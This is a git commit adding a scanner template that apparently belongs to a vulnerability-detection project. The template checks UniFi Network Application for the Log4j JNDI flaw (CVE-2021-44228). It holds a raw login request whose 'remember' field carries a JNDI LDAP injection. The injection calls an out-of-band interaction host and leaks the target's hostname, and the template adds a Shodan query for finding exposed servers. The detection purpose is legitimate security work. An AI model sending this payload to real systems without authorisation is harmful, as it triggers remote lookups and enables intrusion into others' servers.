Added UniFi Network Log4j JNDI RCE (#3402)
Co-Authored-By: KrE80r <13027962+KrE80r@users.noreply.github.com> Co-authored-by: KrE80r <13027962+KrE80r@users.noreply.github.com>patch-1
parent
1ee17e282d
commit
c57984b8f8
|
@ -0,0 +1,43 @@
|
|||
id: unifi-network-log4j-rce
|
||||
|
||||
info:
|
||||
name: UniFi Network Log4j JNDI RCE
|
||||
author: KrE80r
|
||||
severity: critical
|
||||
description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application .
|
||||
reference:
|
||||
- https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
|
||||
- https://twitter.com/sprocket_ed/status/1473301038832701441
|
||||
tags: rce,log4j,ubnt,unifi,oast
|
||||
metadata:
|
||||
shodan-query: http.title:"UniFi Network"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json; charset=utf-8
|
||||
Origin: {{RootURL}}
|
||||
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
|
||||
|
||||
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns" # Confirms the DNS Interaction
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
Loading…
Reference in New Issue